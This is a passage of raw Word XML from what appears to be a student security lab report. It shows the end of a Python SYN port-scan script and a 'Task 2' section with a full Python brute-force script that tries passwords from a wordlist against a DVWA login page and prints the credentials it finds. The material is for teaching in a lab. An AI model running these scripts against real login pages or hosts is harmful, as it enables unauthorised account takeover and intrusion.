      </w:r>
    </w:p>
    <w:p w14:paraId="4F6FDB19" w14:textId="5C4B61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ys.exit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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1135271A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target_i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ys.argv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[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F29BBD4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port_low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= </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="004D718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ys.argv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[2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F179460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port_high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= </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="004D718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D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[3])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A60994F" w14:textId="07AEE9C8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port_range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range(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port_low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port_high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+ 1)  # Include the upper bound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E65A85" w14:textId="77777777" w:rsidR="004D7189" w:rsidRPr="004D7189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End"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f"Starting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 SYN scan on {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target_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i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}"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A97C71" w14:textId="77777777" w:rsidR="0081598B" w:rsidRDefault="004D7189" w:rsidP="00633EB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D718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syn_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scan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D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>target_ip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D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port_range</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473C7F13" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="00633EB0" w:rsidP="00633EB0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0742A34" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="00633EB0" w:rsidP="00633EB0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C9D2E23" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="00633EB0" w:rsidP="00633EB0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0145960F" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="00633EB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FC79D3" w14:textId="24FFB814" w:rsidR="004D5DA1" w:rsidRPr="0081598B" w:rsidRDefault="004D5DA1" w:rsidP="0081598B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D5DA1">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2 --- Brute Forcing Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F10AEC2" w14:textId="77777777" w:rsidR="004D5DA1" w:rsidRDefault="004D5DA1" w:rsidP="004D5DA1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CD6655" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Libraries Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDBA64B" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8755CC" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>This library is used to send HTTP POST requests to the DVWA login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F3690D" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>It provides methods for handling cookies, headers, and POST data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E938E" w14:textId="37126C00" w:rsidR="004D5DA1" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>requests.post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>, data=data, cookies=cookies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377FA27C" w14:textId="1F194A71" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368932EF" w14:textId="340805ED" w:rsidR="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Enables command-line argument parsing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362ACEA" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B90547D" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Used to validate the existence of the password file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D7DE6" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491F57E8" w14:textId="64B137E3" w:rsidR="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Safely </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>parses</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> the co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>okies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E210AC" w14:textId="71BBE5EE" w:rsidR="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D5DA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5070DCB6" wp14:editId="3FADEF13">
            <wp:extent cx="3909646" cy="2258907"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="164627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78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202" cy="22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0CFB" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="0081598B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60255C3C" w14:textId="0EB97077" w:rsidR="00FB7D5B" w:rsidRPr="0081598B" w:rsidRDefault="00FB7D5B" w:rsidP="0081598B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Part 1</w:t>
      </w:r>
      <w:r w:rsidR="00E01E33" w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E01E33" w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Brute Force Script with Command-Line Input and Error Checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056A282A" w14:textId="4DA39738" w:rsidR="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>ccept all the input values in the form of command line</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205759D4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>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521DDC07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>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284F2998" w14:textId="1AED4B65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B7D5B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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7FFB7665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def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cracking(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7D5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B7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>url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B7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>passwdfile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B7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fail_string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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9FA26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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE6E94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# Open and read the password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E4F776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open(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passwdfile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, 'r') as passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F63F97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for password in passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F22F8A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                password =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password.strip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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30169700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'Trying: ' + password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DABBAFB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    data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= {'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username': username, 'password': password, 'Login': 'submit'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7031232C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    # Send POST request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F2FB8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    response =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requests.post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FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>url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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F766C80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fail_string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response.content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.decode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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2D4F5B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14:paraId="1E4A1C45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    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B3E1D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'Found username ==&gt; ' + username)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA971B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'Found password ==&gt; ' + password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583C5F8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exit(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E88CB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'No match found')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2BB72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except </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FileNotFoundError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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3DED3E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FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>f"Error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: Password file '{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passwdfile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}' not found.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C31B6C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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FFC50B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except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requests.exceptions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.RequestException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 as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0337036D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FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>f"Error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: Failed to connect to the URL.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Details: {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e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ECB879" w14:textId="613DCCF9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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056DC291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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECDE886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# Check if the correct number of arguments are provided</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E5132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len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) != 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695DAFF2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"Usage: python bruteforce1.py &lt;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url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&gt; &lt;username&gt; &lt;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password_file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&gt; &lt;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fail_string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&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405ABC62" w14:textId="759E9EC4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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F9D3A4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# Extract arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523924D3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url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[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7546A25E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username =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[2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CFE9AF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passwdfile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[3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353BA503" w14:textId="1C1891D0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fail_string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[4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C362F18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# Validate the password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B97EBD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>.isfile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passwdfile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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483FFC64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FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>f"Error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: Password file '{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passwdfile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}' does not exist.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE10CF2" w14:textId="49777504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FB7D5B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FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA52DD" w14:textId="77777777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# Start cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007831CB" w14:textId="15926421" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B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FB7D5B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FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cracking(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">username, 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url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passwdfile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FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fail_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E86059" w14:textId="77777777" w:rsidR="0081598B" w:rsidRDefault="0081598B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C8B7AF" w14:textId="6D62872B" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="0081598B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Script Logic</w:t>
      </w:r>
    </w:p>
